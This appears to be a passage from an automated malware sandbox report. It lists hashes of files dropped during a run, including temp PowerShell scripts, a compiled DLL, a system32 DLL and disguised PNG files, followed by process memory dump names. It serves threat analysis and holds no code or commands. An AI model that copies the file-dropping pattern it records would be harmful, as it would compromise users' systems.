  SHA256: b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
  SHA512: 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3e9c5d27-4903-4f49-aa18-33ffc5ff0076
  MD5: 7f79b990cb5ed648f9e583fe35527aa7
  SHA1: 71b177b48c8bd745ef02c2affad79ca222da7c33
  SHA256: 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
  SHA512: 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_88330b45-5718-4cdc-84ab-1c354903508e
  MD5: a70ee38af4bb2b5ed3eeb7cbd1a12fa3
  SHA1: 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
  SHA256: dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
  SHA512: 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f6d77ca6-de71-47cb-8071-792c0cb0e9eb
  MD5: 2d5cd190b5db0620cd62e3cd6ba1dcd3
  SHA1: ff4f229f4fbacccdf11d98c04ba756bda80aac7a
  SHA256: ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
  SHA512: edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
  MD5: 6ea4a38d903d92b829e92e7c36b1facc
  SHA1: 051052126538ccd866f919dd78a302af42820a4d
  SHA256: 71925e822449eae8c589c4f7e502f39bc3f6a7f6f04d19399c494166ac369630
  SHA512: bc61c6f4e9d979cc08e9d513e3e33255a7e49627332e4cbb3bee7f4ee813c56a4704df1b13b41d0b7c12ca77011558bdcbd2c29349798892ae23d3a39a316ae0
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex (second capture of the same path)
  MD5: cf284edd4e3dc7703d11a5a9de2b6960
  SHA1: f26058acfdbbb4a242d51584666ed9abf56d6500
  SHA256: e6037f85bc79a45ab5f98412d2e4696d4eae43115fb230ec4ccb8e1b7ea6c591
  SHA512: 3295175a29910a25012b25a3b874273511d993bc8ecc8ac343fc3b92fabff4d699aaa509d4b86339a897281814bee1d8afd8f8120b92dbff0bf219ece47a807a
- C:\Users\Admin\AppData\Local\Temp\RESA489.tmp
  MD5: 9f4cbc0cf291525302c02948f07597b6
  SHA1: 03e63f57c062b44ede0df916efa9f07242f5d83e
  SHA256: ca0d1cff1d0026e27b315378caa05df073b3a57e145bc8aaef72c34d02d3f496
  SHA512: 8a7dc4c48b4a7c5940706368a6739a8e265b882c18cc154545e38cdff942e066a3efb352faadbc7e8d03def09c0c30e88c3b87f19d6ca8e8f8fca76715d37f51
- C:\Users\Admin\AppData\Local\Temp\gzhxopf0\gzhxopf0.dll
  MD5: 304797b1978f10d26c405645f2f9676f
  SHA1: cceaf42852f5e62128e4a4702db11b5f31f931f2
  SHA256: 648659248d1997df43c32cec911dae42618d9afdce9acc03127a048b83cc5482
  SHA512: 0bbd45a1ddb82bf251cbf9a59b33db592ecb4d124e6afb77fdec7b466556abfaff333dc7bf43c66fa45725393f9a1c29b973abd557003dc19c0676be5265bb64
- C:\Users\Admin\AppData\Local\Temp\ready.ps1
  MD5: 3447df88de7128bdc34942334b2fab98
  SHA1: 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
  SHA256: 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
  SHA512: 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
- C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
  MD5: 920b50692e0e9c4e32c79f89fafce0c4
  SHA1: 4cb71db2bb05daa4e84c649b6c58cbfd20c8e484
  SHA256: 85fda9140e2356752f4139c674b78e36e4bb5da57b7cff27d8db357a4357deaf
  SHA512: 966f23d6366c0a901114e84e64e9d209e77f1de6e40e93ad7d55047732b4ba213fdac8f05cd21cebfe11a0bab79e2cc95739fa3c6eb0eafc917568a7168c7d86
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: baea9da2a5adf3d3555d141943d5c252
  SHA1: c8851e4ec4255569e88b4a1b204ab213837afabf
  SHA256: fe28bfd58e8997b0e017fa6c780a108630bd6ec0a65a928263764a646f690656
  SHA512: 51e2539b3e0c8b6709c110c8c4b697f8424e79bdb5187bb025d0330f415af0bbde9a923be54e580faf1f097f1718b411bad85bd0d764eff8effc916d0b719a8c
- C:\Windows\system32\rfxvmt.dll
  MD5: dc39d23e4c0e681fad7a3e1342a2843c
  SHA1: 58fd7d50c2dca464a128f5e0435d6f0515e62073
  SHA256: 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
  SHA512: 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
- \??\PIPE\srvsvc
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
- \??\c:\Users\Admin\AppData\Local\Temp\gzhxopf0\CSCDBCC0248C7A847EBA4688113AFEA8E2.TMP
  MD5: c0b2d968396e781ec16b639ef8d854ec
  SHA1: f4862407da18d10d1404c866f0b1b7f134bd8480
  SHA256: 685a106757616dfd046d43ceb802001deb7cc07ef913b4673646711ebe8c5c71
  SHA512: ad09df30b0d630da155f4a12143a2149b63de774fef4d6668c65cd5a2f09220299f595312edbb5956001fe1e496864b68cba4b430e0dd7b3edd51dbf7ed701c1
- \??\c:\Users\Admin\AppData\Local\Temp\gzhxopf0\gzhxopf0.0.cs
  MD5: 4864fc038c0b4d61f508d402317c6e9a
  SHA1: 72171db3eea76ecff3f7f173b0de0d277b0fede7
  SHA256: 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
  SHA512: 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
- \??\c:\Users\Admin\AppData\Local\Temp\gzhxopf0\gzhxopf0.cmdline
  MD5: 6a9ce746dbc6343db54528e8258f1708
  SHA1: a7373d221424027ba4b6da999474a341e67a00ef
  SHA256: 6c7d1e4e13f344bf196e175a3645e644cf6129e14b1d32c5c32c9caae8dfaa1b
  SHA512: e27caca198a438ff775177d06d86c49989968245d15eb1cd8f1410766f52497c6451b4072a4fab493e8f33ff6a18b1504f8b0f824d2d4375c4f69b60a0e0a906
- \Windows\Branding\mediasrv.png
  MD5: 96a6c5d47b0670a98699b2b424e2e65e
  SHA1: 57a31831c368efd82801f94a1b72c7230f4288be
  SHA256: bba6c1f56f0b7f40778d8e862aba528160e02890bb0313dfe1f934e4aafca05f
  SHA512: b3107141bc206c12afc80c673463288057d6d302c44b568746af5e530f214c5e136ca7edb07c70afa0b6abd6720e7cd4917a4cdd6c82c7d3d5528b76222e6c55
- \Windows\Branding\mediasvc.png
  MD5: a3da4eee0a06c45c5bec80fd959ad539
  SHA1: a8d2d3691af2e1af85ed8947347d0981017b7a32
  SHA256: 8a7fc19bdb25f16870854c72f936ed9598ffefc4da506bad61e13a890acfae9c
  SHA512: 8d3dcf7d05930b390f8c8928d8910c0b8aa19604d195c8ab4001b73a4866ad4adabc772bee9a391433c2946eeb427f4f1e08092ee8dc7056fe45a1db035e822b
Memory dumps (pid-index-range; size in parentheses where the report gives one)
- memory/300-173-0x0000000000000000-mapping.dmp
- memory/456-172-0x0000000000000000-mapping.dmp
- memory/536-181-0x0000000000000000-mapping.dmp
- memory/576-163-0x0000000000000000-mapping.dmp
- memory/636-177-0x0000000000000000-mapping.dmp
- memory/752-182-0x0000000000000000-mapping.dmp
- memory/828-186-0x0000000000000000-mapping.dmp
- memory/860-165-0x0000000000000000-mapping.dmp
- memory/888-191-0x0000000000000000-mapping.dmp
- memory/1004-189-0x0000000000000000-mapping.dmp
- memory/1008-133-0x000000001A9E0000-0x000000001A9E1000-memory.dmp (4KB)
- memory/1008-121-0x0000000000000000-mapping.dmp
- memory/1008-134-0x0000000002470000-0x0000000002471000-memory.dmp (4KB)
- memory/1008-131-0x000000001B770000-0x000000001B771000-memory.dmp (4KB)
- memory/1008-129-0x0000000002500000-0x0000000002501000-memory.dmp (4KB)
- memory/1008-127-0x000000001A964000-0x000000001A966000-memory.dmp (8KB)
- memory/1008-126-0x000000001A960000-0x000000001A962000-memory.dmp (8KB)
- memory/1064-157-0x0000000000000000-mapping.dmp
- memory/1072-194-0x0000000000000000-mapping.dmp
- memory/1084-207-0x0000000000000000-mapping.dmp
- memory/1084-185-0x0000000000000000-mapping.dmp
- memory/1100-64-0x0000000040FB7000-0x0000000040FB8000-memory.dmp (4KB)
- memory/1100-62-0x0000000040FB4000-0x0000000040FB6000-memory.dmp (8KB)
- memory/1100-61-0x0000000040FB2000-0x0000000040FB4000-memory.dmp (8KB)
- memory/1100-59-0x0000000041660000-0x0000000041A81000-memory.dmp (4.1MB)
- memory/1100-63-0x0000000040FB6000-0x0000000040FB7000-memory.dmp (4KB)
- memory/1116-168-0x0000000000000000-mapping.dmp
- memory/1132-195-0x0000000000000000-mapping.dmp
- memory/1160-78-0x0000000000000000-mapping.dmp
- memory/1212-164-0x0000000000000000-mapping.dmp
- memory/1212-190-0x0000000000000000-mapping.dmp
- memory/1216-160-0x0000000000000000-mapping.dmp
- memory/1256-167-0x0000000000000000-mapping.dmp
- memory/1276-176-0x0000000000000000-mapping.dmp
- memory/1288-75-0x0000000000000000-mapping.dmp
- memory/1376-188-0x0000000000000000-mapping.dmp
- memory/1384-206-0x0000000000000000-mapping.dmp
- memory/1388-204-0x00000000196CA000-0x00000000196E9000-memory.dmp (124KB)
- memory/1388-203-0x00000000196C4000-0x00000000196C6000-memory.dmp (8KB)
- memory/1388-202-0x00000000196C0000-0x00000000196C2000-memory.dmp (8KB)
- memory/1388-196-0x0000000000000000-mapping.dmp
- memory/1436-187-0x0000000000000000-mapping.dmp
- memory/1576-183-0x0000000000000000-mapping.dmp
- memory/1632-192-0x0000000000000000-mapping.dmp
- memory/1672-148-0x000000001AB90000-0x000000001AB92000-memory.dmp (8KB)
- memory/1672-150-0x000000001AB94000-0x000000001AB96000-memory.dmp (8KB)
- memory/1672-142-0x0000000000000000-mapping.dmp
- memory/1672-178-0x0000000000000000-mapping.dmp
- memory/1684-193-0x0000000000000000-mapping.dmp
- memory/1684-170-0x0000000000000000-mapping.dmp
- memory/1696-174-0x0000000000000000-mapping.dmp
- memory/1700-169-0x0000000000000000-mapping.dmp
- memory/1708-85-0x000000001C2B0000-0x000000001C2B1000-memory.dmp (4KB)
- memory/1708-101-0x000000001AD2A000-0x000000001AD49000-memory.dmp (124KB)
- memory/1708-65-0x0000000000000000-mapping.dmp
- memory/1708-156-0x000000001C7F0000-0x000000001C7F1000-memory.dmp (4KB)
- memory/1708-66-0x000007FEFC1D1000-0x000007FEFC1D3000-memory.dmp (8KB)
- memory/1708-67-0x0000000002380000-0x0000000002381000-memory.dmp (4KB)
- memory/1708-86-0x0000000002700000-0x0000000002701000-memory.dmp (4KB)
- memory/1708-68-0x000000001ADA0000-0x000000001ADA1000-memory.dmp (4KB)
- memory/1708-69-0x00000000023C0000-0x00000000023C1000-memory.dmp (4KB)
- memory/1708-84-0x000000001B650000-0x000000001B651000-memory.dmp (4KB)
- memory/1708-82-0x0000000002410000-0x0000000002411000-memory.dmp (4KB)
- memory/1708-70-0x000000001AD20000-0x000000001AD22000-memory.dmp (8KB)
- memory/1708-71-0x000000001AD24000-0x000000001AD26000-memory.dmp (8KB)
- memory/1708-72-0x00000000023F0000-0x00000000023F1000-memory.dmp (4KB)
- memory/1708-74-0x000000001AC40000-0x000000001AC41000-memory.dmp (4KB)
- memory/1744-166-0x0000000000000000-mapping.dmp
- memory/1744-184-0x0000000000000000-mapping.dmp
- memory/1768-95-0x0000000002440000-0x0000000002441000-memory.dmp (4KB)
- memory/1768-94-0x000000001AB74000-0x000000001AB76000-memory.dmp (8KB)
- memory/1768-97-0x000000001AAD0000-0x000000001AAD1000-memory.dmp (4KB)
- memory/1768-99-0x000000001A9F0000-0x000000001A9F1000-memory.dmp (4KB)
- memory/1768-100-0x0000000002460000-0x0000000002461000-memory.dmp (4KB)
- memory/1768-87-0x0000000000000000-mapping.dmp
- memory/1768-106-0x000000001B670000-0x000000001B671000-memory.dmp (4KB)
- memory/1768-93-0x000000001AB70000-0x000000001AB72000-memory.dmp (8KB)
- memory/1768-119-0x000000001B6E0000-0x000000001B6E1000-memory.dmp (4KB)
- memory/1768-120-0x000000001B6F0000-0x000000001B6F1000-memory.dmp (4KB)
- memory/1800-205-0x0000000000000000-mapping.dmp
- memory/1856-208-0x0000000000000000-mapping.dmp
- memory/1856-159-0x0000000000000000-mapping.dmp
- memory/1960-161-0x0000000000000000-mapping.dmp
- memory/2000-162-0x0000000000000000-mapping.dmp
- memory/2028-171-0x0000000000000000-mapping.dmp
- memory/2032-175-0x0000000000000000-mapping.dmp